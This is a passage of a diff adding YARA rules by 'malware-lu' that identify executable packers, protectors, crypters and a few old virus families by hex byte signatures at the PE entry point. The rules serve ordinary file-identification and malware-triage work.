+		author="malware-lu"
+strings:
+		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEProtectv09
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3 }
+	$a1 = { E9 ?? 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 20 28 43 29 6F }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule nbuildv10soft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? BB ?? ?? C0 ?? ?? 80 ?? ?? 43 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01StelthPE101Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 BA ?? ?? ?? ?? FF E2 BA E0 10 40 00 B8 68 24 1A 40 89 02 83 C2 03 B8 40 00 E8 EE 89 02 83 C2 FD FF E2 2D 3D 5B 20 48 69 64 65 50 45 20 5D 3D 2D 90 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IProtect10FxSubdllmodebyFuXdas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 53 75 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED B6 13 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 A8 13 40 00 8D 85 81 13 40 00 50 FF B5 A8 13 40 00 E8 92 00 00 00 0B C0 74 13 89 85 A4 13 40 00 8D 85 8E 13 40 00 50 FF 95 A4 13 40 00 8B 85 AC 13 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 B5 FA FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSVisualCv8DLLhsmallsig2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B FF 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 0F 84 ?? ?? 00 00 83 FE 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSVisualCv8DLLhsmallsig1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B FF 55 8B EC 83 7D 0C 01 75 05 E8 ?? ?? ?? FF 5D E9 D6 FE FF FF CC CC CC CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16xVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv20MarkusLaszloReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }
+
+condition:
+		$a0
+}
+	
+	
+rule BladeJoinerv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv133Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF }
+	$a1 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FSGv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtMicrosoftVisualC6070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SuperDAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 F3 42 00 68 A4 BF 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 08 F2 42 00 33 D2 8A D4 89 15 60 42 43 00 8B C8 81 E1 FF 00 00 00 89 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv200alpha38
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 80 B8 BF 10 00 10 01 74 7A C6 80 BF 10 00 10 01 9C 55 53 51 57 52 56 8D 98 0F 10 00 10 8B 53 14 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 8B F8 50 8B 33 8B 53 14 03 F2 8B 4B 0C 03 CA 8D 85 B7 10 00 10 FF 73 04 8F }
+
+condition:
+		$a0
+}
+	
+	
+rule RCryptor16cVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TheGuardLibrary
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor01build001GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 68 26 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02BJFNT12Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv08
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall2736Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 58 BB F3 1C 00 00 2B C3 50 68 00 00 40 00 68 00 26 00 00 68 CC 00 00 00 E8 C1 FE FF FF E9 97 FF FF FF CC CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler11Cp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E4 53 56 33 C0 89 45 E4 89 45 E8 89 45 EC B8 C0 47 00 10 E8 4F F3 FF FF BE 5C 67 00 10 33 C0 55 68 D2 4A 00 10 64 FF 30 64 89 20 E8 EB DE FF FF E8 C6 F8 FF FF BA E0 4A 00 10 B8 CC 67 00 10 E8 5F F8 FF FF 8B D8 8B D6 8B C3 8B 0D CC 67 00 10 E8 3A DD FF FF 8B 46 50 8B D0 B8 D4 67 00 10 E8 5B EF FF FF B8 D4 67 00 10 E8 09 EF FF FF 8B D0 8D 46 14 8B 4E 50 E8 14 DD FF FF 8B 46 48 8B D0 B8 D8 67 00 ?? ?? ?? ?? ?? FF B8 D8 67 00 10 E8 E3 EE FF FF 8B D0 8B C6 8B 4E 48 E8 EF DC FF FF FF 76 5C FF 76 58 FF 76 64 FF 76 60 B9 D4 67 00 10 8B 15 D8 67 00 10 A1 D4 67 00 10 E8 76 F6 FF FF A1 D4 67 00 10 E8 5C EE FF FF 8B D0 B8 CC 67 00 10 E8 CC F7 FF FF 8B D8 B8 DC 67 00 10 }
+
+condition:
+		$a0
+}
+	
+	
+rule y0dasCrypterv1xModified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov252b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv036betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C }
+	$a1 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 82 8E FE FF FF 58 8B 4E 40 5F E3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxNecropolis
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 FC AD 33 C2 AB 8B D0 E2 F8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinUpackv039finalrelocatedimagebaseByDwingc2005h2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD 03 C3 50 97 AD 91 F3 A5 5E AD 56 91 01 1E AD E2 FB AD 8D 6E 10 01 5D 00 8D 7D 1C B5 ?? F3 AB 5E AD 53 50 51 97 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv1061bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule aPackv062
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ED 10 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Ningishzida10CyberDoom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 96 E8 00 00 00 00 5D 81 ED 03 25 40 00 B9 04 1B 00 00 8D BD 4B 25 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectSKE21xdllAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PAVCryptorPawningAntiVirusCryptormasha_dev
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 BB 2C ?? ?? 70 BE 00 30 00 70 BF 20 ?? ?? 70 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 00 70 00 74 06 FF 15 54 30 00 70 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 1C 30 00 70 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 14 30 00 70 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 8F FA FF FF FF 15 20 30 00 70 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 70 00 74 06 FF 15 10 ?? ?? 70 8B 06 50 E8 A9 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 00 70 E8 26 FF FF FF C3 90 8F 05 04 30 00 70 E9 E9 FF FF FF C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeShieldCryptor13RCTomCommander
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 8C 21 40 00 B9 51 2D 40 00 81 E9 E6 21 40 00 8B D5 81 C2 E6 21 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrinklerV01V02RuneLHStubbeandAskeSimonChristensen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGRUNT4Family
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 1C 00 8D 9E 41 01 40 3E 8B 96 14 03 B9 EA 00 87 DB F7 D0 31 17 83 C3 02 E2 F7 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackV112002006BetaNEOxuinC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 EC 01 00 00 E8 F8 06 00 00 E8 03 06 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1800
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22006115WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 50 45 3A 20 45 6E 63 72 79 70 74 50 45 20 56 32 2E 32 30 30 36 2E 31 2E 31 35 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrincessSandyv10eMiNENCEProcessPatcherPatch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 27 11 40 00 E8 3C 01 00 00 6A 00 E8 41 01 00 00 A3 00 20 40 00 8B 58 3C 03 D8 0F B7 43 14 0F B7 4B 06 8D 7C 18 18 81 3F 2E 4C 4F 41 74 0B 83 C7 28 49 75 F2 E9 A7 00 00 00 8B 5F 0C 03 1D 00 20 40 00 89 1D 04 20 40 00 8B FB 83 C7 04 68 4C 20 40 00 68 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule aPackv082
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C CB BA ?? ?? 03 DA 8D ?? ?? ?? FC 33 F6 33 FF 48 4B 8E C0 8E DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoiner01AsmVersionNEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 68 00 14 40 00 68 00 10 40 00 6A 00 E8 14 00 00 00 6A 00 E8 13 00 00 00 CC FF 25 AC 12 40 00 FF 25 B0 12 40 00 FF 25 B4 12 40 00 FF 25 B8 12 40 00 FF 25 BC 12 40 00 FF 25 C0 12 40 00 FF 25 C4 12 40 00 FF 25 C8 12 40 00 FF 25 CC 12 40 00 FF 25 D0 12 40 00 FF 25 D4 12 40 00 FF 25 D8 12 40 00 FF 25 DC 12 40 00 FF 25 E4 12 40 00 FF 25 EC 12 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsiduim1304ObsiduimSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02FSG131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CodeSafe20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01NorthStarPEShrinker13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ocBat2Exe10OC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 58 3C 40 00 E8 6C FA FF FF 33 C0 55 68 8A 3F 40 00 64 FF 30 64 89 20 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 81 E9 FF FF 8B 45 EC E8 41 F6 FF FF 50 E8 F3 FA FF FF 8B F8 83 FF FF 0F 84 83 02 00 00 6A 02 6A 00 6A EE 57 E8 FC FA FF FF 6A 00 68 60 99 4F 00 6A 12 68 18 57 40 00 57 E8 E0 FA FF FF 83 3D 60 99 4F 00 12 0F 85 56 02 00 00 8D 45 E4 50 8D 45 E0 BA 18 57 40 00 B9 40 42 0F 00 E8 61 F4 FF FF 8B 45 E0 B9 12 00 00 00 BA 01 00 00 00 E8 3B F6 FF FF 8B 45 E4 8D 55 E8 E8 04 FB ?? ?? ?? ?? E8 B8 58 99 4F 00 E8 67 F3 FF FF 33 C0 A3 60 99 4F 00 8D 45 DC 50 B9 05 00 00 00 BA 01 00 00 00 A1 58 99 4F 00 E8 04 F6 FF FF 8B 45 DC BA A4 3F 40 00 E8 E3 F4 FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule ASDPack20asd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8D 49 00 1F 01 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 90 }
+	$a1 = { 5B 43 83 7B 74 00 0F 84 08 00 00 00 89 43 14 E9 }
+	$a2 = { 8B 44 24 04 56 57 53 E8 CD 01 00 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule EXECryptor2021protectedIAT
+{
+      meta:
+		author="malware-lu"
+strings:
